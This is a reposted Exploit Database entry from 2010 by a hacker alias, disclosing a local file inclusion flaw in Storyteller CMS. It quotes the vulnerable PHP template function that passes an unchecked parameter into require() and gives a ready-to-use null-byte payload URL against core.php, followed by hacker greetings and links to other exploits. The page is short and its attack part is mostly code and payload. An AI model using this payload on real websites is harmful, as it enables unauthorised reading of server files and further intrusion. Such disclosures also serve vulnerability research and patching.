Storyteller CMS – ‘var’ Local File Inclusion

Exploit Database
83 阅读

作者： h4ck3r

日期： 2010-09-13
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/14996/

==
[~] Title: Storyteller CMS (var) Local File Include Vuln
[~] Version: n/a
[~] Link: http://www.esselbach.com/freeware.php?id=2
==
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
==
[~] Vuln code:
in GetTemplate function , line 113 to 127

function GetTemplate($var)
{ 
if (file_exists("templates/$var.tmp.php"))
{
require("templates/$var.tmp.php");
}
else
{
die ("Error: Can't open template $var");
}
return $EST_TEMPLATE; 
}

[~] 3xploit:
/core.php?var=[Local-File]%00
==
[#] Greetings:

Dr.2 , darkc0de team , inj3ct0r's Community , and all ma friends ,,
==

last Exploits
Storyteller CMS – ‘var’ Local File Inclusion的更多信息

TWiki 5.0.1 – ‘origurl’ Cross-Site Scripting：
TomatoCart 1.x – SQL Injection：
Snortreport – ‘/nmap.php’ / ‘nbtscan.php’ Remote Command Execution (Metasploit)：
IBM Informix Dynamic Server – Code Injection / Remote Code Execution：
Crea8Social 2.0 – Cross-Site Scripting Change Interface：
Your Own Classifieds – Cross-Site Scripting：
vPhoto-Album 4.2 iOS – Local File Inclusion：
PhpTax – ‘pfilez’ Execution Remote Code Injection (Metasploit)：